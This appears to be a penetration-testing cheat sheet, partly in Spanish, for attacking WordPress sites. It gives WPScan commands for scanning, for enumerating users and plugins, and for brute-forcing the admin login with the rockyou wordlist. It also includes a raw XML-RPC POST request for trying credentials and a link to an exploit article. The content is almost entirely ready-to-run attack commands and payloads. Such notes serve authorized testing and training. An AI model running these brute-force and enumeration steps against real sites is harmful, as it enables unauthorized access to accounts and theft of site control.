WPScan
Use
wpscan --url https://WEB.com
Enumeration
Users & Plugins
wpscan --url https://WEB.com --enumerate u,p
usuarios validos potenciales existentes
Brute Force
wpscan --url https://WEB.com -U admin -P /usr/share/wordlist/rockyou.txt
Ataque de fuerza bruta en el panel de autenticación para descubrir credenciales validas.
Este procedimiento también se pude hacer de forma manual con un script de Bash o Python.
XMLRPC
Seria necesario también una petición POST al archivo xmlrpc.php con estructura XML
POST /xmlrpc.php HTTP/1.1
Host: example.com
Content-Length: 235
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>\{\{your username\}\}</value></param>
<param><value>\{\{your password\}\}</value></param>
</params>
</methodCall>
Referencia ; Exploit : https://nitesculucian.github.io/2019/07/01/exploiting-the-xmlrpc-php-on-all-wordpress-versions
Last updated